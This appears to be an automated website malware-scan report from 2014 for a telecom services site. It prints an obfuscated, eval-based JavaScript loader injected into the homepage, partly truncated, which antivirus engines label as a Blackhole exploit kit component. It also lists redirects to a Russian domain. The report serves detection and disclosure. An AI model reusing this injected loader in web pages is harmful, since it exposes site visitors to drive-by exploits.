New scan:

Malware Scanner report for ecstelecomservices.com

Malicious/Suspicious/Total urls checked
1/0/17
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ecstelecomservices.com/
200 OK
Content-Length: 7669
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function wue(){pgl=function(){--(mgozpi.body)}()}fajzjo="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)rjhddx=4;ojc=("74,ba,c9,c2,b7,c8,bd,c3,c2,74,b9,84,8d,7c,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c8,bd,b7,91,7b,b5,be,b5,cc,7b,8f,61,5e,74,ca,b5,c6,74,b7,c3,c2,c8,c6,c3,c0,c0,b9,c6,91,7b,bd,c2,b8,b9,cc,82,c4,bc,c4,7b,8f,61,5e,74,ca,b5,c6,74,b9,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c6,b9,b5,c8,b9,99,c0,b9,c1,b9,c2,c8,7c,7b,bd,ba,c6,b5,c1,b9,7b,7d,8f,61,5e,61,5e,74,b9,82,c7,c6,b7,74,91,7
... 3552 bytes are skipped ...
c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,7d,91,91,89,89,7d,cf,d1,b9,c0,c7,b9,cf,a7,b9,c8,97,c3,c3,bf,bd,b9,7c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,80,74,7b,89,89,7b,80,74,7b,85,7b,80,74,7b,83,7b,7d,8f,61,5e,61,5e,b9,84,8d,7c,7d,8f,61,5e,d1,61,5e,d1".split(","));zyqpny=window["asdeval".substr(3)];mgozpi=window.document;for(ghtbv=0;ghtbv<ojc["le"+"ngth"];ghtbv+=1){ojc[ghtbv]=-(84)+parseInt(ojc[ghtbv],rjhddx*4);}try{wue()}catch(aifr){vvegsk=50-50;}if(!vvegsk)zyqpny(String[fajzjo].apply(String,ojc));

Antivirus reports:

Avast
JS:Decode-BMN [Trj]
Ikarus
Exploit.JS.Blackhole
nProtect
JS:Exploit.JS.Blacole.Z
Emsisoft
JS:Exploit.JS.Blacole.Z (B)
Comodo
TrojWare.JS.Kryptik.aga
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Fortinet
JS/Kryptik.APC!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.JS.Blacole.Z
AVG
JS/Exploit
Norman
Blacole.XQ
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.APA
BitDefender
JS:Exploit.JS.Blacole.Z

http://ecstelecomservices.com/test404page.js
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:21 GMT
Accept-Ranges: bytes
Age: 0
Location: http://mediciron.ru/
Server: Apache/2
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 31 Aug 2014 16:47:21 GMT
clean
http://mediciron.ru/
200 OK
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru/modernizr.js
200 OK
Content-Length: 6296
Content-Type: application/javascript
clean
http://ecstelecomservices.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
HTTP/1.1 302 Found
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:23 GMT
Accept-Ranges: bytes
Age: 0
Location: http://mediciron.ru/
Server: Apache/2
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 31 Aug 2014 16:47:23 GMT
clean
http://mediciron.ru/test404page.js
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean
http://mediciron.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/modernizr.js/
404 Not Found
Content-Length: 34894
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ecstelecomservices.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 31 Aug 2014 15:47:20 GMT
Accept-Ranges: bytes
Age: 319
ETag: "1df5-4e7ecfc1302d4"
Server: Apache/2
Content-Length: 7669
Content-Type: text/html
Expires: Sun, 31 Aug 2014 16:42:01 GMT
Last-Modified: Fri, 04 Oct 2013 16:42:14 GMT

...7669 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecstelecomservices.com
Referer: http://www.google.com/search?q=ecstelecomservices.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ecstelecomservices.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ecstelecomservices.com/

Result: ecstelecomservices.com is not infected or malware details are not published yet.